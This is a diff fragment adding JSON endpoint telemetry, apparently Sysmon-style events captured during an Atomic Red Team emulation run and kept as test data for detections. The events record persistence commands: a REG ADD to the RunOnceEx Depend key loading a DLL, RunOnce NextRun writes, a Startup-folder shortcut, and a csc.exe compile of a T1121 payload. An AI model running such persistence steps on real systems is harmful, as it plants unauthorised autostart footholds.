"image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853860000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853860000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853860000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "command_line": "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d C:\\Path\\AtomicRedTeam.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7008, + "ppid": 5084, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883570854120000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}", + "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": 
"C:\\Windows\\System32\\reg.exe", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": 
"C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "registry", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", + "registry_value": "Depend", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "registry", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend\\1", + "registry_value": "1", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "process", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "process", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3792, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "command_line": "REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1484, + "ppid": 3792, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883570854459984, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}", + "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": 
"{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "registry", + "pid": 1484, + "process_name": "reg.exe", + 
"process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend\\1", + "registry_value": "1", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "process", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "process", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1688, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570854620000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "process", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570854650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun", + "registry_value": "NextRun", + "timestamp": 131883570855110000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun", + "registry_value": "NextRun", + "timestamp": 131883570855270000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "file", + "file_name": "Notepad.lnk", + "file_path": "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Notepad.lnk", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "timestamp": 131883570856830000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4760, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570858150000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570858080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 
131883570858080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570858080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570858080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570858080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3592, + "ppid": 4760, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "subtype": "create", + "timestamp": 131883570858230000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}", + "unique_ppid": "{42FC7E13-CADD-5C05-0000-00108A214D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + 
"timestamp": 131883570858400000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570858400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858550000, + "unique_pid": 
